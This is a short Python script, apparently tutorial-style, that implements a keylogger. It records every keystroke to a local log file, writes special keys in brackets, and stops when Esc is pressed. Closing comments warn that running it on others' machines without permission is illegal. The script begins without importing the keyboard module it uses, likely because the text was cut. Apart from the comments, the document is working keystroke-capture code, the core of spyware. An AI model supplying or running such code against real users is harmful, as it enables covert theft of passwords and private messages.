#Listens for keystrokes.
#Saves them into a local text file (log.txt).
#Stops gracefully when you press a specific key (e.g., Esc).
#---------------------------------------------------------------------------------------------------#

# File where keystrokes will be saved
log_file = "log.txt"

def on_press(key):
    try:
        # Open file in append mode
        with open(log_file, "a") as f:
            f.write(f"{key.char}")
    except AttributeError:
        # Handle special keys
        with open(log_file, "a") as f:
            f.write(f"[{key}]")

def on_release(key):
    # Stop listener if Esc is pressed
    if key == keyboard.Key.esc:
        print("Stopping keylogger...")
        return False

# Start listening
with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()

#------------------------------------------------------------------------------------------------------#
#How it works:
#When you press a key, it writes to log.txt.
#Regular characters (a, b, 1, etc.) are logged as-is.
#Special keys (like Enter, Space, Shift) are logged in square brackets.
#Pressing Esc will stop the script cleanly.
#⚠️ Important Notes:
#This should only be run in a controlled/testing environment (like your own machine in a test folder).
#Do not use this on someone else’s computer or without explicit permission — that would be illegal.